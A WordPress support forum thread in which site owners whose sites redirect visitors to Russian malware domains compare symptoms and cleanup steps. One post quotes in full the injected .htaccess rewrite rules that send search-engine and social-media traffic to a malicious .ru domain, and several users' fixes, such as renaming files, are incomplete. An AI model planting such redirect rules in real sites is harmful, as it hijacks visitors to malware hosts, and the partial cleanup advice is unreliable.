WordPress.org

Ready to get started?Download WordPress

Forums

Was our website hacked? PLEASE HELP! (30 posts)

  1. jaxsonhype
    Member
    Posted 2 years ago #

    For some of our posts on our page (www.Metszilla.com), when we go to click on the link in order to read the full post, we get sent to this address (http://uaroyalysdaliachu.ru/industry/index.php) and an error message pops up.

    Same thing happens when we upload the link to facebook and you try to navigate from facebook to our page, it sends you right to http://uaroyalysdaliachu.ru/industry/index.php

    PLEASE HELP!

  2. friendlyspeaking
    Member
    Posted 2 years ago #

    Same here, since yesterday it is redirecting to http://uaroyalysdaliachu.ru and now google search engine has started showing malware notice on website when go through search engine, something got infected in wordpress on 15th Feb. 2012. Please post the solution or any malware removal script if anyone has tried it.

  3. rewiaca
    Member
    Posted 2 years ago #

    Solution:
    Chmod .htaccess from 444 to 666
    Check .htaccess and remove lines in up and bottom of document.

    BUT! Im cleanin htaccess file third time a day. WordPress core or some plugins has vulnerability. Need qualified advice

  4. yaniv1983
    Member
    Posted 2 years ago #

    Same here.

    1. Updated .htaccess
    2. Re-uploaded all core files
    3. Runned "Timthumb Scanner" plugin

    Problem is still here with link to the same site as you all mentioned. Please if you find a solution post it here... Thanks!

  5. esmi
    Forum Moderator
    Posted 2 years ago #

  6. Hydromantic
    Member
    Posted 2 years ago #

    Hi everyone!

    Exactly the same problem here unfortunately... I tried various things but nothing works. Did you find which files was hacked? I don't find them...

    Many thanks!!

  7. croftonwiffleball
    Member
    Posted 2 years ago #

    Hey all, this happened to me to? I have no idea what I need to do to fix it? Im a newb when it comes to this stuff!

  8. Hydromantic
    Member
    Posted 2 years ago #

    I tried the fresh install but it changed nothing unfortunately...

  9. Mickstah
    Member
    Posted 2 years ago #

    I had a friend who had his WordPress installation hacked just over the weekend. This is the second time it has happened, even after a fresh install and security measures put in place.

    If possible talk to your hosting company to see if they can offer a solution. In his case it was a problem on the hosting side.

  10. Hydromantic
    Member
    Posted 2 years ago #

    It seems that the problem comes from the index page but I don't find much more...

  11. friendlyspeaking
    Member
    Posted 2 years ago #

    Hi, I contacted my server provider (hostgator) about this issue, they have scanned and cleaned all the malware scripts which was even injected in the root domain, then I submited to Google webmaster tool for "Attack Page Website message" removal and within 24 hours all sites are back to normal. Do contact your server provider because this is what you cannot clean on your own quickly. I found Hostgator is extermly helpful that is why I had shifted my sites from Godaddy to Hostgator.

  12. friendlyspeaking
    Member
    Posted 2 years ago #

    You can check here if your website got blacklisted in google because of malware, you can also check which files on your server got infected by this malware.

    click here http://sitecheck.sucuri.net/scanner/

  13. rewiaca
    Member
    Posted 2 years ago #

    Solution:
    1. Chmod .htaccess from 444 to 666
    2. Check .htaccess and remove lines in up and bottom of document.
    3. Chmod .htaccess from 666 to 444

    works for me

    this shit was in htaccess:
    for seo:

    [Code moderated as per the Forum Rules. Please use the pastebin]

  14. xXcyberXx
    Member
    Posted 2 years ago #

    This is not the best solution the malware script stll be there.
    Have anybody a another solution for this?
    I have found more files in the subdirectorys with malware. For example in the subdirectory wp-admin is one file it caled wp-ggxy.php
    And i have detected more of one file with this names wp-xxxx.php

  15. Hydromantic
    Member
    Posted 2 years ago #

    Unfortunately I found nothing in the htaccess file, do you mean the one in the root of the domain?

    I didn't find any corrupted subdirectory neither...

  16. dreamdrivendesigns
    Member
    Posted 2 years ago #

    Restoring backups of last working copy doesn't work. All the .htaccess files were back with redirects within hours. Has anyone found a solution?

  17. jaxsonhype
    Member
    Posted 2 years ago #

    OK guys, finally got it fixed but it was a painful process. In short, you have to restore your blog, but I'll post exactly what we did from start to finish:

    *Temporarily fixed the issue by going into our cpanel file manger and editing our hd access file. I would think this is different for every hosting service so my advice would be to call your hosting company and have them take a look at the file.

    *After the temp fix acted up I restored the blog. I first backed up the blog creating a new file. After backing up the site to an earlier date; in our case I chose jan 29th. After it was fixed -- I went to google search to make sure -- I then went into our cpanel and deleted the file I backed up.

  18. Hydromantic
    Member
    Posted 2 years ago #

    Any news about this hacking attack?

  19. welpix
    Member
    Posted 2 years ago #

    same here. first it was inserting in to .htaccess files http://daliachu-uaroyalys.ru/industry/index.php now it's adding http://uaroyalysdaliachu.ru/industry/index.php

    I cleaned my PC
    completely re-installed all WP blogs
    set 444 attributes to all .htaccess files

    but in 10 mutes it happened again. It's like catching the wind ...

  20. MickeyRoush
    Member
    Posted 2 years ago #

    welpix wrote:

    set 444 attributes to all .htaccess files

    but in 10 mutes it happened again. It's like catching the wind ...

    If they are rewriting/overwriting your .htaccess files then they may have server access. Have you checked your FTP/SFTP logs?

  21. Hydromantic
    Member
    Posted 2 years ago #

    Yep. They add this code to the htacces file :

    <IfModule mod_rewrite.c>																														
    
    																														RewriteEngine On																														
    
    																														RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)																														
    
    																														RewriteRule ^(.*)$ http://bannortimqimulta.ru/industry/index.php [R=301,L]																														
    
    																														RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)																														
    
    																														RewriteRule ^(.*)$ http://bannortimqimulta.ru/industry/index.php [R=301,L]																														
    
    																														</IfModule>

    And they change the htaccess permissions to 444 instead of 604. What can we do?

  22. rewiaca
    Member
    Posted 2 years ago #

    Okey guys, i have same problem so far...
    Nothing helps

    BTW: not only wordpress was hacked, i have websites on DLE and Livestreet, they also have that htaccess annoying replacing. SO ITS NOT WordPress vulnerability!

    If i could only trace what script editing htaccess, maybe some kind of server logs?

  23. KEXINO
    Member
    Posted 2 years ago #

    Same issue here (with WP sites).

    Looking around I found a bunch of .php files. I think it's these files which are re-filling the .htaccess files with all the redirection junk.

    For me, the dodgy .php files were found in various subfolders within wp-content/uploads.

    I've weeded out all the files, changed all user passwords, ftp passwords and db passwords. I've installed BulletPoint, though I don't know how much that'll help (before I found all the dodgy files my .htaccess file was still getting overwritten, even with BulletPoint active).

    Before, my .htacesss files were being overwritten within 15-20 mins of me clearing out the garbage. Now, it's been 2 hours and everything is still OK - touch wood.

    HTH.

  24. welpix
    Member
    Posted 2 years ago #

    I have re-installed clean 4 out of my 10 blogs about 14 hours ago. They are clean so far. What did differently is I used only limited number of plugins. My suspicion is that anything beyond these may be causing it.

    all-in-one-seo-pack
    google-sitemap-generator
    woocommerce
    wp-super-cache
    contact-form-7
    widget-context

  25. rewiaca
    Member
    Posted 2 years ago #

    HOLD ON I GOT IT!!!

    CHECK YOUR WORDPRESS THEME FOR NEXT FILES AND DIRS:

    /inc.php
    /timthumb.php
    /cache/ (with a lot of external_1f3d51de6d5f7b7e7fca0af8a635a413.php)

    If some of your site got this shit, so this is the place where malware comes from.
    Just rename (add some symbols in name of file) this files and clean your htaccess files, i suppose all will be well.

    timthumb.php has vulnerability!

    More information:
    http://www.claudiokuenzler.com/blog/206/another-timthumb-wordpress-hack-external-upload-httpd-process

  26. welpix
    Member
    Posted 2 years ago #

    none of those were in mine, but there is one good article about it as well http://blog.sucuri.net/2011/05/understanding-htaccess-attacks-part-1.html

  27. Charles Kelley
    Member
    Posted 2 years ago #

    Rewiaca- Did renaming those files fix the issue permanently (or thus far) for you?

    I just started getting this these this morning, have tried to replace .htaccess files only to have them rewritten 10 minutes later. Has anything actually worked permanently for anyone?

    Trying to avoid doing a complete re-install for the 20+ sites I have hosted if it's not WordPress' vulnerability.

    Just curious...what web host is everyone using? I use BlueHost.

  28. kmessinger
    Volunteer Moderator
    Posted 2 years ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Just renaming files will not solve the problem. You have to be very aggressive in cleaning and replacing files. Follow the instructions in the above links and check out the other links folks have posted here. Notify your host. I you have problems it is likely that everyone on the server has problems.

    When clean follow this http://codex.wordpress.org/Hardening_WordPress.

    If you are unable to do it yourself there are sites like http://sitecheck.sucuri.net that will do it for you.

  29. KEXINO
    Member
    Posted 2 years ago #

    +1 for sucuri.net.

    After grappling with the problem myself for the best part of a day, I threw in the towel and signed-up for their $190/yr plan. They sorted the problem out on all my sites and now continuously monitor/scan every few hours for anything unusual.

    If you're running a commercial / mission critical site you might want to consider using them, if for nothing else than piece of mind.

    (No affiliation, just a recommendation).

  30. Charles Kelley
    Member
    Posted 2 years ago #

    All, we've found a working fix to this problem. See the whole post here and follow my directions which are more secure that some that others are offering.

    http://wordpress.org/support/topic/i-have-been-well-and-truly-hacked?replies=46#post-2642987

Topic Closed

This topic has been closed to new replies.

About this Topic